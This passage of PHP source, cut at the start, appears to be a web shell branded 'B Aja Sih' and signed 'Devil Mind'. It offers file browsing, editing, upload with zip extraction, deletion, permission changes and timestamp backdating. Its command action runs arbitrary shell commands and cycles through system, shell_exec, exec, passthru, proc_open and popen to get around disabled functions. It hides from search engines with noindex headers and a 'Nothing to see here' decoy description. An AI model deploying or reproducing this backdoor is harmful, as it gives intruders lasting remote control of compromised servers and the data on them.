= 1024 && $i < count($units) - 1) { $value /= 1024; $i++; } return sprintf($i === 0 ? '%.0f %s' : '%.2f %s', $value, $units[$i]); } function parse_datetime_input(string $input): ?int { $value = trim($input); if ($value === '') { return null; } // Support both HTML datetime-local style and plain SQL-like datetime. $normalized = str_replace('T', ' ', $value); $dt = DateTime::createFromFormat('Y-m-d H:i:s', $normalized); if ($dt instanceof DateTime) { return $dt->getTimestamp(); } $ts = strtotime($normalized); return $ts === false ? null : $ts; } function rrmdir(string $dir): bool { if (!is_dir($dir)) { return false; } $items = scandir($dir); if ($items === false) { return false; } foreach ($items as $item) { if ($item === '.' || $item === '..') { continue; } $full = join_path($dir, $item); if (is_dir($full) && !is_link($full)) { if (!rrmdir($full)) { return false; } } else { if (!@unlink($full)) { return false; } } } return @rmdir($dir); } function add_to_zip(ZipArchive $zip, string $absPath, string $insideName): bool { if (is_dir($absPath) && !is_link($absPath)) { $zip->addEmptyDir($insideName); $items = scandir($absPath); if ($items === false) { return false; } foreach ($items as $item) { if ($item === '.' || $item === '..') { continue; } $childAbs = join_path($absPath, $item); $childInside = trim($insideName . '/' . $item, '/'); if (!add_to_zip($zip, $childAbs, $childInside)) { return false; } } return true; } return $zip->addFile($absPath, $insideName); } function stream_and_remove_file(string $tmpFile, string $downloadName): void { if (!is_file($tmpFile)) { http_response_code(404); exit('File not found.'); } header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . rawurlencode($downloadName) . '"'); header('Content-Length: ' . (string) filesize($tmpFile)); header('Pragma: public'); header('Cache-Control: private'); readfile($tmpFile); @unlink($tmpFile); exit; } function download_single(string $absPath): void { if (is_file($absPath)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . rawurlencode(basename($absPath)) . '"'); header('Content-Length: ' . (string) filesize($absPath)); header('Pragma: public'); header('Cache-Control: private'); readfile($absPath); exit; } if (is_dir($absPath)) { if (!class_exists('ZipArchive')) { http_response_code(500); exit('ZipArchive extension is required for folder download.'); } $tmp = tempnam(sys_get_temp_dir(), 'fm_'); if ($tmp === false) { http_response_code(500); exit('Cannot create temporary zip.'); } @unlink($tmp); $zipPath = $tmp . '.zip'; $zip = new ZipArchive(); if ($zip->open($zipPath, ZipArchive::CREATE | ZipArchive::OVERWRITE) !== true) { http_response_code(500); exit('Cannot create zip.'); } add_to_zip($zip, $absPath, basename($absPath)); $zip->close(); stream_and_remove_file($zipPath, basename($absPath) . '.zip'); } } function disabled_functions(): array { $raw = (string) ini_get('disable_functions'); if (trim($raw) === '') { return []; } return array_map('trim', explode(',', $raw)); } function can_use_function(string $name): bool { static $disabled = null; if ($disabled === null) { $disabled = disabled_functions(); } return function_exists($name) && is_callable($name) && !in_array($name, $disabled, true); } function run_command_with_fallback(string $command): array { $methods = ['system', 'shell_exec', 'exec', 'passthru', 'proc_open', 'popen']; foreach ($methods as $method) { if (!can_use_function($method)) { continue; } $output = ''; $exitCode = null; if ($method === 'system') { ob_start(); $ret = 0; system($command . ' 2>&1', $ret); $output = (string) ob_get_clean(); $exitCode = $ret; } elseif ($method === 'shell_exec') { $result = shell_exec($command . ' 2>&1'); $output = (string) $result; } elseif ($method === 'exec') { $lines = []; $ret = 0; exec($command . ' 2>&1', $lines, $ret); $output = implode(PHP_EOL, $lines); $exitCode = $ret; } elseif ($method === 'passthru') { ob_start(); $ret = 0; passthru($command . ' 2>&1', $ret); $output = (string) ob_get_clean(); $exitCode = $ret; } elseif ($method === 'proc_open') { $descriptors = [ 0 => ['pipe', 'r'], 1 => ['pipe', 'w'], 2 => ['pipe', 'w'], ]; $process = proc_open($command, $descriptors, $pipes); if (is_resource($process)) { fclose($pipes[0]); $stdout = stream_get_contents($pipes[1]); fclose($pipes[1]); $stderr = stream_get_contents($pipes[2]); fclose($pipes[2]); $exitCode = proc_close($process); $output = (string) $stdout . (string) $stderr; } } elseif ($method === 'popen') { $handle = popen($command . ' 2>&1', 'r'); if (is_resource($handle)) { while (!feof($handle)) { $output .= (string) fgets($handle); } $exitCode = pclose($handle); } } return [ 'ok' => true, 'method' => $method, 'output' => trim($output) === '' ? '[no output]' : $output, 'exit_code' => $exitCode, ]; } return [ 'ok' => false, 'method' => 'unavailable', 'output' => 'Command cannot run: all command functions are disabled or unavailable. SSI fallback is not available in this setup.', 'exit_code' => null, ]; } function flash_set(string $type, string $message): void { $_SESSION['flash'] = ['type' => $type, 'message' => $message]; } function flash_get(): ?array { if (!isset($_SESSION['flash'])) { return null; } $flash = $_SESSION['flash']; unset($_SESSION['flash']); return $flash; } function redirect_to_dir(string $scopeRoot, string $currentDir): void { $rel = rel_path($scopeRoot, $currentDir); $query = $rel === '' ? '' : '?p=' . rawurlencode($rel); header('Location: ' . strtok($_SERVER['REQUEST_URI'] ?? '', '?') . $query); exit; } function is_ajax_request(): bool { return (isset($_POST['ajax']) && $_POST['ajax'] === '1') || (isset($_SERVER['HTTP_X_REQUESTED_WITH']) && $_SERVER['HTTP_X_REQUESTED_WITH'] === 'XMLHttpRequest'); } function ajax_response(bool $success, string $message, array $data = []): void { header('Content-Type: application/json'); echo json_encode([ 'success' => $success, 'message' => $message, 'data' => $data, ]); exit; } $homeRel = str_replace('\\', '/', $rootDir); // Handle AJAX action requests (POST with AJAX flag) if ($_SERVER['REQUEST_METHOD'] === 'POST' && is_ajax_request()) { $token = (string) ($_POST['token'] ?? ''); if (!hash_equals($_SESSION['fm_token'], $token)) { ajax_response(false, 'Invalid token.'); } $currentDir = safe_current_dir($scopeRoot, $rootDir, $_POST['p'] ?? null); $action = (string) ($_POST['action'] ?? ''); switch ($action) { case 'create_file': $name = trim((string) ($_POST['name'] ?? '')); if ($name === '' || str_contains($name, '/') || str_contains($name, '\\')) { ajax_response(false, 'Invalid file name.'); } $newFile = join_path($currentDir, $name); if (file_exists($newFile)) { ajax_response(false, 'File already exists.'); } if (@file_put_contents($newFile, '') !== false) { $fileRel = rel_path($scopeRoot, $newFile); ajax_response(true, 'File created.', ['file_rel' => $fileRel]); } else { ajax_response(false, 'Failed to create file.'); } break; case 'create_folder': $name = trim((string) ($_POST['name'] ?? '')); if ($name === '' || str_contains($name, '/') || str_contains($name, '\\')) { ajax_response(false, 'Invalid folder name.'); } $newFolder = join_path($currentDir, $name); if (file_exists($newFolder)) { ajax_response(false, 'Folder already exists.'); } if (@mkdir($newFolder, 0755, true)) { ajax_response(true, 'Folder created.'); } else { ajax_response(false, 'Failed to create folder.'); } break; case 'save_edit': $itemRel = (string) ($_POST['item'] ?? ''); $targetAbs = safe_item_abs($scopeRoot, $itemRel); if ($targetAbs === null || !is_file($targetAbs)) { ajax_response(false, 'File not found.'); } $content = (string) ($_POST['content'] ?? ''); if (@file_put_contents($targetAbs, $content) !== false) { ajax_response(true, 'File saved.'); } else { ajax_response(false, 'Failed to save file.'); } break; case 'rename': $itemRel = (string) ($_POST['item'] ?? ''); $newName = trim((string) ($_POST['new_name'] ?? '')); $targetAbs = safe_item_abs($scopeRoot, $itemRel); if ($targetAbs === null) { ajax_response(false, 'Item not found.'); } if ($newName === '' || str_contains($newName, '/') || str_contains($newName, '\\')) { ajax_response(false, 'Invalid name.'); } $dest = join_path(dirname($targetAbs), $newName); if (@rename($targetAbs, $dest)) { ajax_response(true, 'Renamed successfully.'); } else { ajax_response(false, 'Rename failed.'); } break; case 'permission': $itemRel = (string) ($_POST['item'] ?? ''); $permInput = trim((string) ($_POST['perm'] ?? '')); $targetAbs = safe_item_abs($scopeRoot, $itemRel); if ($targetAbs === null) { ajax_response(false, 'Item not found.'); } if (!preg_match('/^[0-7]{3,4}$/', $permInput)) { ajax_response(false, 'Invalid permission format (use octal like 755).'); } if (@chmod($targetAbs, octdec($permInput))) { ajax_response(true, 'Permission updated.'); } else { ajax_response(false, 'Failed to update permission.'); } break; case 'change_date': $itemRel = (string) ($_POST['item'] ?? ''); $dateInput = (string) ($_POST['new_date'] ?? ''); $targetAbs = safe_item_abs($scopeRoot, $itemRel); if ($targetAbs === null) { ajax_response(false, 'Item not found.'); } $ts = parse_datetime_input($dateInput); if ($ts === null) { ajax_response(false, 'Invalid date format. Use YYYY-MM-DD HH:MM:SS or YYYY-MM-DDTHH:MM:SS'); } // Use mtime-only touch for better cross-platform compatibility. if (@touch($targetAbs, $ts)) { ajax_response(true, 'Date updated.'); } else { ajax_response(false, 'Failed to update date.'); } break; case 'delete': $itemRel = (string) ($_POST['item'] ?? ''); $targetAbs = safe_item_abs($scopeRoot, $itemRel); if ($targetAbs === null) { ajax_response(false, 'Item not found.'); } if (is_dir($targetAbs) && !is_link($targetAbs)) { if (rrmdir($targetAbs)) { ajax_response(true, 'Folder deleted.'); } else { ajax_response(false, 'Failed to delete folder.'); } } else { if (@unlink($targetAbs)) { ajax_response(true, 'File deleted.'); } else { ajax_response(false, 'Failed to delete file.'); } } break; case 'bulk_delete': $selected = $_POST['selected'] ?? []; if (!is_array($selected) || count($selected) === 0) { ajax_response(false, 'No items selected.'); } $okCount = 0; foreach ($selected as $rel) { $targetAbs = safe_item_abs($scopeRoot, (string) $rel); if ($targetAbs === null) continue; if (is_dir($targetAbs) && !is_link($targetAbs)) { if (rrmdir($targetAbs)) $okCount++; } else { if (@unlink($targetAbs)) $okCount++; } } ajax_response(true, "Deleted {$okCount} item(s)."); break; case 'upload': if (!isset($_FILES['upload_file']) || !is_array($_FILES['upload_file']['name'])) { ajax_response(false, 'No upload file found.'); } $names = $_FILES['upload_file']['name']; $tmpNames = $_FILES['upload_file']['tmp_name']; $errors = $_FILES['upload_file']['error']; $okCount = 0; $extractCount = 0; for ($i = 0; $i < count($names); $i++) { if ((int) $errors[$i] !== UPLOAD_ERR_OK) { continue; } $base = basename((string) $names[$i]); if ($base === '') { continue; } $dest = join_path($currentDir, $base); if (!@move_uploaded_file((string) $tmpNames[$i], $dest)) { continue; } $okCount++; if (strtolower(pathinfo($base, PATHINFO_EXTENSION)) === 'zip' && class_exists('ZipArchive')) { $zip = new ZipArchive(); if ($zip->open($dest) === true) { $extractTo = join_path($currentDir, pathinfo($base, PATHINFO_FILENAME)); if (!is_dir($extractTo)) { @mkdir($extractTo, 0755, true); } if ($zip->extractTo($extractTo)) { $extractCount++; } $zip->close(); } } } ajax_response(true, "Upload: {$okCount} file(s), ZIP extracted: {$extractCount}."); break; case 'command': $cmd = trim((string) ($_POST['cmd'] ?? '')); if ($cmd === '') { ajax_response(false, 'Command is empty.'); } $oldCwd = getcwd(); @chdir($currentDir); $commandResult = run_command_with_fallback($cmd); if ($oldCwd !== false) { @chdir($oldCwd); } ajax_response(true, $commandResult['method'], [ 'output' => $commandResult['output'], 'exit_code' => $commandResult['exit_code'], 'ok' => $commandResult['ok'], ]); break; default: ajax_response(false, 'Unknown action.'); } } $homeRel = str_replace('\\', '/', $rootDir); // Handle AJAX API requests if (isset($_GET['api']) && $_GET['api'] === 'list') { $apiDir = safe_current_dir($scopeRoot, $scopeRoot, $_GET['p'] ?? null); $items = scandir($apiDir) ?: []; $apiRows = []; foreach ($items as $item) { if ($item === '.' || $item === '..') { continue; } $abs = join_path($apiDir, $item); $stat = @stat($abs); $isDir = is_dir($abs) && !is_link($abs); $apiRows[] = [ 'name' => $item, 'rel' => rel_path($scopeRoot, $abs), 'type' => $isDir ? 'folder' : 'file', 'size' => $isDir ? '-' : human_size((int) (@filesize($abs) ?: 0)), 'perm' => substr(sprintf('%o', (int) (@fileperms($abs) ?: 0)), -4), 'mtime' => $stat !== false ? date('Y-m-d H:i:s', (int) $stat['mtime']) : '-', ]; } usort($apiRows, static function (array $a, array $b): int { if ($a['type'] !== $b['type']) { return $a['type'] === 'folder' ? -1 : 1; } return strcasecmp($a['name'], $b['name']); }); $apiBreadcrumbs = []; $relPath = rel_path($scopeRoot, $apiDir); $scopeNorm = str_replace('\\', '/', $scopeRoot); $rootLabel = preg_match('/^[A-Za-z]:\/$/', $scopeNorm) === 1 ? strtoupper(substr($scopeNorm, 0, 2)) : '/'; $scopeQueryBase = rtrim(str_replace('\\', '/', $scopeRoot), '/'); $scopeQueryBase = $scopeQueryBase === '' ? '/' : $scopeQueryBase; $rootQuery = $scopeQueryBase === '/' ? '/' : ($scopeQueryBase . '/'); $apiBreadcrumbs[] = ['query' => $rootQuery, 'label' => $rootLabel]; if ($relPath !== '') { $segments = array_filter(explode('/', $relPath), static function ($v) { return $v !== ''; }); $acc = ''; foreach ($segments as $seg) { $acc .= ($acc === '' ? '' : '/') . $seg; $queryPath = $scopeQueryBase === '/' ? ('/' . $acc) : ($scopeQueryBase . '/' . $acc); $apiBreadcrumbs[] = ['query' => $queryPath, 'label' => $seg]; } } header('Content-Type: application/json'); echo json_encode([ 'rows' => $apiRows, 'fullPathCrumbs' => $apiBreadcrumbs, 'currentDir' => rel_path($scopeRoot, $apiDir), 'currentQuery' => str_replace('\\', '/', $apiDir), ]); exit; } if (isset($_GET['api']) && $_GET['api'] === 'view') { $fileRel = (string) ($_GET['file'] ?? ''); $fileAbs = safe_item_abs($scopeRoot, $fileRel); if ($fileAbs === null || !is_file($fileAbs)) { header('Content-Type: application/json'); http_response_code(404); echo json_encode(['success' => false, 'message' => 'File not found']); exit; } $content = @file_get_contents($fileAbs); if ($content === false) { header('Content-Type: application/json'); http_response_code(500); echo json_encode(['success' => false, 'message' => 'Failed to read file']); exit; } header('Content-Type: application/json'); echo json_encode([ 'success' => true, 'file' => $fileRel, 'content' => $content, 'size' => filesize($fileAbs), ]); exit; } $currentDir = safe_current_dir($scopeRoot, $rootDir, $_GET['p'] ?? null); if (isset($_GET['download'])) { $targetAbs = safe_item_abs($scopeRoot, (string) $_GET['download']); if ($targetAbs !== null) { download_single($targetAbs); } http_response_code(404); exit('Target not found.'); } $commandResult = null; if ($_SERVER['REQUEST_METHOD'] === 'POST') { $isAjax = is_ajax_request(); $token = (string) ($_POST['token'] ?? ''); if (!hash_equals($_SESSION['fm_token'], $token)) { if ($isAjax) { ajax_response(false, 'Invalid token.'); } flash_set('error', 'Invalid token.'); redirect_to_dir($scopeRoot, $currentDir); } $action = (string) ($_POST['action'] ?? ''); $itemRel = (string) ($_POST['item'] ?? ''); if ($action === 'create_file') { $name = trim((string) ($_POST['name'] ?? '')); if ($name === '' || str_contains($name, '/') || str_contains($name, '\\')) { if ($isAjax) { ajax_response(false, 'Invalid file name.'); } flash_set('error', 'Invalid file name.'); } else { $newFile = join_path($currentDir, $name); if (file_exists($newFile)) { if ($isAjax) { ajax_response(false, 'File already exists.'); } flash_set('error', 'File already exists.'); } else { $ok = @file_put_contents($newFile, '') !== false; if ($isAjax) { if ($ok) { ajax_response(true, 'File created.'); } else { ajax_response(false, 'Failed to create file.'); } } flash_set($ok ? 'success' : 'error', $ok ? 'File created.' : 'Failed to create file.'); } } if (!$isAjax) { redirect_to_dir($scopeRoot, $currentDir); } } if ($action === 'create_folder') { $name = trim((string) ($_POST['name'] ?? '')); if ($name === '' || str_contains($name, '/') || str_contains($name, '\\')) { if ($isAjax) { ajax_response(false, 'Invalid folder name.'); } flash_set('error', 'Invalid folder name.'); } else { $newFolder = join_path($currentDir, $name); if (file_exists($newFolder)) { if ($isAjax) { ajax_response(false, 'Folder already exists.'); } flash_set('error', 'Folder already exists.'); } else { $ok = @mkdir($newFolder, 0755, true); if ($isAjax) { if ($ok) { ajax_response(true, 'Folder created.'); } else { ajax_response(false, 'Failed to create folder.'); } } flash_set($ok ? 'success' : 'error', $ok ? 'Folder created.' : 'Failed to create folder.'); } } if (!$isAjax) { redirect_to_dir($scopeRoot, $currentDir); } } if ($action === 'upload') { if (!isset($_FILES['upload_file']) || !is_array($_FILES['upload_file']['name'])) { flash_set('error', 'No upload file found.'); redirect_to_dir($scopeRoot, $currentDir); } $names = $_FILES['upload_file']['name']; $tmpNames = $_FILES['upload_file']['tmp_name']; $errors = $_FILES['upload_file']['error']; $okCount = 0; $extractCount = 0; for ($i = 0; $i < count($names); $i++) { if ((int) $errors[$i] !== UPLOAD_ERR_OK) { continue; } $base = basename((string) $names[$i]); if ($base === '') { continue; } $dest = join_path($currentDir, $base); if (!@move_uploaded_file((string) $tmpNames[$i], $dest)) { continue; } $okCount++; if (strtolower(pathinfo($base, PATHINFO_EXTENSION)) === 'zip' && class_exists('ZipArchive')) { $zip = new ZipArchive(); if ($zip->open($dest) === true) { $extractTo = join_path($currentDir, pathinfo($base, PATHINFO_FILENAME)); if (!is_dir($extractTo)) { @mkdir($extractTo, 0755, true); } if ($zip->extractTo($extractTo)) { $extractCount++; } $zip->close(); } } } flash_set('success', "Upload finished: {$okCount} file(s), zip extracted: {$extractCount}."); redirect_to_dir($scopeRoot, $currentDir); } if ($action === 'save_edit') { $targetAbs = safe_item_abs($scopeRoot, $itemRel); if ($targetAbs === null || !is_file($targetAbs)) { flash_set('error', 'File for editing not found.'); redirect_to_dir($scopeRoot, $currentDir); } $content = (string) ($_POST['content'] ?? ''); $ok = @file_put_contents($targetAbs, $content) !== false; flash_set($ok ? 'success' : 'error', $ok ? 'File saved.' : 'Failed to save file.'); redirect_to_dir($scopeRoot, $currentDir); } if ($action === 'rename') { $targetAbs = safe_item_abs($scopeRoot, $itemRel); $newName = trim((string) ($_POST['new_name'] ?? '')); if ($targetAbs === null) { flash_set('error', 'Rename target not found.'); } elseif ($newName === '' || str_contains($newName, '/') || str_contains($newName, '\\')) { flash_set('error', 'Invalid new name.'); } else { $dest = join_path(dirname($targetAbs), $newName); $ok = @rename($targetAbs, $dest); flash_set($ok ? 'success' : 'error', $ok ? 'Rename success.' : 'Rename failed.'); } redirect_to_dir($scopeRoot, $currentDir); } if ($action === 'permission') { $targetAbs = safe_item_abs($scopeRoot, $itemRel); $permInput = trim((string) ($_POST['perm'] ?? '')); if ($targetAbs === null) { flash_set('error', 'Permission target not found.'); } elseif (!preg_match('/^[0-7]{3,4}$/', $permInput)) { flash_set('error', 'Permission format must be octal, for example 755 or 0644.'); } else { $perm = octdec($permInput); $ok = @chmod($targetAbs, $perm); flash_set($ok ? 'success' : 'error', $ok ? 'Permission updated.' : 'Failed to update permission.'); } redirect_to_dir($scopeRoot, $currentDir); } if ($action === 'change_date') { $targetAbs = safe_item_abs($scopeRoot, $itemRel); $dateInput = (string) ($_POST['new_date'] ?? ''); $ts = parse_datetime_input($dateInput); if ($targetAbs === null) { flash_set('error', 'Date target not found.'); } elseif ($ts === null) { flash_set('error', 'Invalid date format. Use YYYY-MM-DD HH:MM:SS or YYYY-MM-DDTHH:MM:SS'); } else { $ok = @touch($targetAbs, $ts); flash_set($ok ? 'success' : 'error', $ok ? 'Date updated.' : 'Failed to update date.'); } redirect_to_dir($scopeRoot, $currentDir); } if ($action === 'delete') { $targetAbs = safe_item_abs($scopeRoot, $itemRel); if ($targetAbs === null) { flash_set('error', 'Delete target not found.'); } elseif (is_dir($targetAbs) && !is_link($targetAbs)) { $ok = rrmdir($targetAbs); flash_set($ok ? 'success' : 'error', $ok ? 'Folder deleted.' : 'Failed to delete folder.'); } else { $ok = @unlink($targetAbs); flash_set($ok ? 'success' : 'error', $ok ? 'File deleted.' : 'Failed to delete file.'); } redirect_to_dir($scopeRoot, $currentDir); } if ($action === 'bulk_delete') { $selected = $_POST['selected'] ?? []; if (!is_array($selected) || count($selected) === 0) { flash_set('error', 'No item selected for delete.'); redirect_to_dir($scopeRoot, $currentDir); } $okCount = 0; $failCount = 0; foreach ($selected as $rel) { $targetAbs = safe_item_abs($scopeRoot, (string) $rel); if ($targetAbs === null || $targetAbs === $scopeRoot) { $failCount++; continue; } if (is_dir($targetAbs) && !is_link($targetAbs)) { if (rrmdir($targetAbs)) { $okCount++; } else { $failCount++; } } else { if (@unlink($targetAbs)) { $okCount++; } else { $failCount++; } } } flash_set('success', "Bulk delete finished: success {$okCount}, failed {$failCount}."); redirect_to_dir($scopeRoot, $currentDir); } if ($action === 'bulk_zip') { $selected = $_POST['selected'] ?? []; if (!is_array($selected) || count($selected) === 0) { flash_set('error', 'No item selected for zip.'); redirect_to_dir($scopeRoot, $currentDir); } if (!class_exists('ZipArchive')) { flash_set('error', 'ZipArchive extension is not available.'); redirect_to_dir($scopeRoot, $currentDir); } $tmp = tempnam(sys_get_temp_dir(), 'fm_'); if ($tmp === false) { flash_set('error', 'Failed to create temporary zip.'); redirect_to_dir($scopeRoot, $currentDir); } @unlink($tmp); $zipPath = $tmp . '.zip'; $zip = new ZipArchive(); if ($zip->open($zipPath, ZipArchive::CREATE | ZipArchive::OVERWRITE) !== true) { flash_set('error', 'Failed to create zip.'); redirect_to_dir($scopeRoot, $currentDir); } $added = 0; foreach ($selected as $rel) { $targetAbs = safe_item_abs($scopeRoot, (string) $rel); if ($targetAbs === null) { continue; } if (add_to_zip($zip, $targetAbs, basename($targetAbs))) { $added++; } } $zip->close(); if ($added === 0) { @unlink($zipPath); flash_set('error', 'No valid item to zip.'); redirect_to_dir($scopeRoot, $currentDir); } stream_and_remove_file($zipPath, 'bulk_' . date('Ymd_His') . '.zip'); } if ($action === 'command') { $cmd = trim((string) ($_POST['cmd'] ?? '')); if ($cmd === '') { if ($isAjax) { ajax_response(false, 'Command is empty.'); } flash_set('error', 'Command is empty.'); redirect_to_dir($scopeRoot, $currentDir); } $oldCwd = getcwd(); @chdir($currentDir); $commandResult = run_command_with_fallback($cmd); if ($oldCwd !== false) { @chdir($oldCwd); } if ($isAjax) { ajax_response(true, $commandResult['method'], [ 'output' => $commandResult['output'], 'exit_code' => $commandResult['exit_code'], 'ok' => $commandResult['ok'], ]); } } } $editingRel = isset($_GET['edit']) ? trim((string) $_GET['edit']) : ''; $editingAbs = $editingRel !== '' ? safe_item_abs($scopeRoot, $editingRel) : null; $editingContent = null; if ($editingAbs !== null && is_file($editingAbs)) { $editingContent = @file_get_contents($editingAbs); } $viewingRel = isset($_GET['view']) ? trim((string) $_GET['view']) : ''; $viewingAbs = $viewingRel !== '' ? safe_item_abs($scopeRoot, $viewingRel) : null; $viewingContent = null; if ($viewingAbs !== null && is_file($viewingAbs)) { $viewingContent = @file_get_contents($viewingAbs); } $items = scandir($currentDir) ?: []; $rows = []; foreach ($items as $item) { if ($item === '.' || $item === '..') { continue; } $abs = join_path($currentDir, $item); $stat = @stat($abs); $isDir = is_dir($abs) && !is_link($abs); $rows[] = [ 'name' => $item, 'rel' => rel_path($scopeRoot, $abs), 'type' => $isDir ? 'folder' : 'file', 'size' => $isDir ? '-' : human_size((int) (@filesize($abs) ?: 0)), 'perm' => substr(sprintf('%o', (int) (@fileperms($abs) ?: 0)), -4), 'mtime' => $stat !== false ? date('Y-m-d H:i:s', (int) $stat['mtime']) : '-', ]; } usort( $rows, static function (array $a, array $b): int { if ($a['type'] !== $b['type']) { return $a['type'] === 'folder' ? -1 : 1; } return strcasecmp($a['name'], $b['name']); } ); $flash = flash_get(); $currentRel = rel_path($scopeRoot, $currentDir); $breadcrumbs = [ ['query' => $homeRel, 'label' => 'B Aja Sih'], ]; if (is_inside_root($rootDir, $currentDir)) { $currentFromHome = rel_path($rootDir, $currentDir); $segments = $currentFromHome === '' ? [] : explode('/', str_replace('\\', '/', $currentFromHome)); $pathAcc = ''; foreach ($segments as $seg) { $pathAcc = $pathAcc === '' ? $seg : $pathAcc . '/' . $seg; $breadcrumbs[] = ['query' => ($homeRel === '' ? $pathAcc : ($homeRel . '/' . $pathAcc)), 'label' => $seg]; } } $fullPathCrumbs = []; $relPath = rel_path($scopeRoot, $currentDir); $scopeNorm = str_replace('\\', '/', $scopeRoot); $rootLabel = preg_match('/^[A-Za-z]:\/$/', $scopeNorm) === 1 ? strtoupper(substr($scopeNorm, 0, 2)) : '/'; $scopeQueryBase = rtrim(str_replace('\\', '/', $scopeRoot), '/'); $scopeQueryBase = $scopeQueryBase === '' ? '/' : $scopeQueryBase; $rootQuery = $scopeQueryBase === '/' ? '/' : ($scopeQueryBase . '/'); $fullPathCrumbs[] = ['query' => $rootQuery, 'label' => $rootLabel]; if ($relPath !== '') { $segments = array_filter(explode('/', $relPath), static function ($v) { return $v !== ''; }); $acc = ''; foreach ($segments as $seg) { $acc .= ($acc === '' ? '' : '/') . $seg; $queryPath = $scopeQueryBase === '/' ? ('/' . $acc) : ($scopeQueryBase . '/' . $acc); $fullPathCrumbs[] = ['query' => $queryPath, 'label' => $seg]; } } $scheme = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http'; $host = (string) ($_SERVER['HTTP_HOST'] ?? gethostname()); $requestPath = (string) (parse_url((string) ($_SERVER['REQUEST_URI'] ?? '/'), PHP_URL_PATH) ?: '/'); $canonicalUrl = $scheme . '://' . $host . $requestPath; $seoTitle = 'B Aja Sih - ' . $host; $seoDescription = 'Whut? Nothing to see here.'; $seoImage = 'https://t4.ftcdn.net/jpg/05/51/40/41/360_F_551404175_l9rXdLce08oE55qBX47m9tpq9Eb0eHSs.jpg'; if (!headers_sent()) { header('X-Robots-Tag: noindex, nofollow, noarchive, nosnippet', true); } ?> <?= e($seoTitle) ?>
[]

$crumb): ?> |

List

Name Type Size Permission Date
Directory is empty.
edit edit download
© Devil Mind.